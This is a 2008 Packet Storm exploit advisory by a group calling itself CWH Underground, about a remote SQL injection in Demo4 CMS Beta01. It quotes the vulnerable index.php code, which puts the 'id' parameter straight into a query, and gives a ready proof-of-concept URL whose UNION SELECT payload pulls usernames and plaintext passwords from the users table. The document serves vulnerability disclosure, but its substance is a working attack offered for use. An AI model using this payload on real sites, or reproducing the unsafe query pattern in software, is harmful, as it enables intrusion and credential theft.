demo4-sql.txt

2008-06-23T00:00:00
ID PACKETSTORM:67586
Type packetstorm
Reporter CWH Underground
Modified 2008-06-23T00:00:00

Description

                                        
                                            `===============================================================  
Demo4 CMS (index.php id) Remote SQL Injection Vulnerability  
===============================================================  
  
,--^----------,--------,-----,-------^--,  
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..  
`+---------------------------^----------|  
`\_,-------, _________________________|  
/ XXXXXX /`| /  
/ XXXXXX / `\ /  
/ XXXXXX /\______(  
/ XXXXXX /   
/ XXXXXX /  
(________(   
`------'  
  
  
AUTHOR : CWH Underground  
DATE : 23 June 2008  
SITE : www.citec.us  
  
  
#####################################################  
APPLICATION : Demo4 CMS   
VERSION : Beta01  
VENDOR : N/A  
DOWNLOAD : http://downloads.sourceforge.net/demo4  
#####################################################  
  
--- Remote SQL Injection ---  
  
-----------------------------  
Vulnerable File [index.php]  
-----------------------------  
  
@Line  
  
8: if ($_GET['id']=="")  
9: $id = $startpage;  
10: else  
11: $id = $_GET['id'];  
12: database_connect();  
13: $query = "SELECT * from content  
14: WHERE id = $id";  
15: $error = mysql_error();  
  
---------  
Exploit  
---------  
  
[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection]  
  
  
**This exploits can get username and password (No Encryption)**  
  
-------------  
POC Exploit  
-------------  
  
[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users  
  
  
##################################################################  
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #  
##################################################################  
`